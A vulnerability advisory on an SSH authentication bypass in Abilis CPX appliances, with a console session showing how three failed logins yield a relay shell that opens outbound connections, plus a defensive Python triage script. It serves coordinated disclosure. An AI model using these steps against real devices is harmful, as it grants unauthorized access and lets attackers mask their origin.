Abilis CPX Authentication Bypass

Products: Abilis CPX series telecom appliances
Executive summary

By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can log in to a restricted shell on the fourth attempt and, from there, relay connections. This issue is an instance of CWE-1188, ‘Initialization of a Resource with an Insecure Default,’ and is estimated to have a CVSS 3.1 score of 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant SSVC vectors for this vulnerability are Exploitation: PoC and Technical Impact: Partial.

Technical details

A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.

In the example console session below, three known-incorrect logins (the literal username bad) are offered to an affected device, after which the session is dropped to the SSHS prompt.

$ ssh root@[TARGET]
root@TARGET's password:

COM

Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED


CLR F0 AE

[192.168.11.002] SSHS>

At this point, we are in the SSHS shell. This is a restricted shell, though it can be used as a relay to other systems. The example below moves from it into the SSHC (local SSH client) shell and opens an outbound connection:

[192.168.11.002]help
CP             Open connection to local CP resource
SSH            Open connection to local SSH client
TELNET         Open connection to local TELNET client
<CD>-<UD>      Open X25 call with CD and UD
CLR            Close connection
CLOSE          Close SSH Session
EXIT           Close SSH Session
HELP           Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open

Version identification fault

Like the SSHC shell, the TELNETC shell offers another path to connection relaying, and unlike SSHC it does not require the remote service to answer with a particular protocol handshake (the SSH version exchange failed above):

[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open

Affected Products

Affected versions of CPX devices include:

  • Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
  • Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
  • Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
  • Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
  • Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
  • Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
  • Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
  • Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
  • Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0

Across these devices, affected SSH banners include:

  • SSH-1.99-CPX SSH Server
  • SSH-2.0-CPX SSH Server

Mitigation

According to the vendor, setting a password on the SSH service effectively remedies this behavior. Furthermore, firmware version 9.0.7 has been released so that users can no longer accidentally expose an effectively unauthenticated relay service.
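As an added example (not code from the advisory or from the vendor), the following Python helper applies the criteria above to inventory records: it flags hosts whose SSH protocol banner identifies a CPX SSH Server and whose console banner reports a firmware version below 9.0.7. The host addresses, the record layout and the 9.0.7 console banner are constructed for illustration; a flagged device that already has an SSH password set is not exposed, so the output is a list of devices to verify, not a list of confirmed exposures.

```python
import re

# Constructed inventory records: (host, SSH protocol banner, first line of the
# console banner). The banners follow the formats quoted in the advisory; the
# hosts and the 9.0.7 build string are placeholders, not real captures.
SAMPLE_RECORDS = [
    ("10.0.0.11", "SSH-2.0-CPX SSH Server",
     "Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN"),
    ("10.0.0.12", "SSH-1.99-CPX SSH Server",
     "Abilis CPX - Ver. 7.4.10/STD - Build 3608.48"),
    ("10.0.0.13", "SSH-2.0-CPX SSH Server",
     "Abilis CPX - Ver. 9.0.7/STD - Build XXXX.X - Branch 9.0"),  # placeholder build
    ("10.0.0.14", "SSH-2.0-OpenSSH_9.6", None),
]

FIXED_VERSION = (9, 0, 7)  # firmware release named in the advisory's Mitigation section
CPX_SSH_BANNER = re.compile(r"^SSH-(?:1\.99|2\.0)-CPX SSH Server")
CPX_CONSOLE = re.compile(r"Abilis CPX - Ver\. (\d+)\.(\d+)\.(\d+)/\S+ - Build (\S+)")


def parse_cpx_version(console_banner):
    """Return ((major, minor, patch), build) or None if the line is not a CPX banner."""
    m = CPX_CONSOLE.search(console_banner or "")
    if not m:
        return None
    return (tuple(int(x) for x in m.groups()[:3]), m.group(4))


def is_cpx_ssh(banner):
    """True for the two SSH protocol banners the advisory lists as affected."""
    return bool(CPX_SSH_BANNER.match(banner or ""))


def classify(ssh_banner, console_banner):
    """Return 'affected', 'fixed', 'cpx-unknown-version' or 'not-cpx'."""
    if not is_cpx_ssh(ssh_banner):
        return "not-cpx"
    parsed = parse_cpx_version(console_banner)
    if parsed is None:
        return "cpx-unknown-version"  # CPX SSH seen but no version captured: review manually
    version, _build = parsed
    return "fixed" if version >= FIXED_VERSION else "affected"


def triage(records):
    """Map each host to its verdict so the result can be filtered or exported."""
    return {host: classify(ssh, console) for host, ssh, console in records}


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_RECORDS).items():
        print(f"{host:<12} {verdict}")
```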

Attacker value

By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.

Credit

This issue was discovered by HD Moore and disclosure was coordinated by Tod Beardsley through the AHA! CNA.

Timeline

  • 2025-08-09 (Sat): Briefly demoed at Def Con 33 in the presentation, Shaking Out Shells with SSHamble
  • 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
  • 2025-08-20 (Wed): Provided technical details to the vendor
  • 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
  • 2025-10-21 (Tue): Vendor released Abilis firmware update 9.0.7
  • 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and CVE-2025-35021 reserved
  • 2025-11-03 (Mon): This public disclosure

Written by HD Moore

HD Moore is the founder and CEO of runZero. Previously, he founded the Metasploit Project and served as the main developer of the Metasploit Framework, which is the world's most widely used penetration testing framework.


Written by todb

Tod Beardsley is VP of Security Research at runZero, where he "kicks assets and fakes frames." Prior to 2025, he was the Section Chief for the Vulnerability Response section for CSD/VM/VRC at CISA, the Cybersecurity and Infrastructure Security Agency, part of the US government, and a seasonal Travis County Election Judge in Texas. He's also a founder and CNA point of contact for AHA!.

Tod spends much of his time involved in vulnerability research and coordinated vulnerability disclosure (CVD). He has over 30 years of hands-on security experience, stretching from in-band telephony switching to modern ICS/OT implementations. He has held IT ops, security, software engineering, and management positions in large organizations such as the US Government, Rapid7, 3Com, Dell, and Westinghouse, as both an offensive and defensive practitioner. Tod is a CVE Board member, has authored several research papers, and is an internationally-tolerated horror fiction expert.
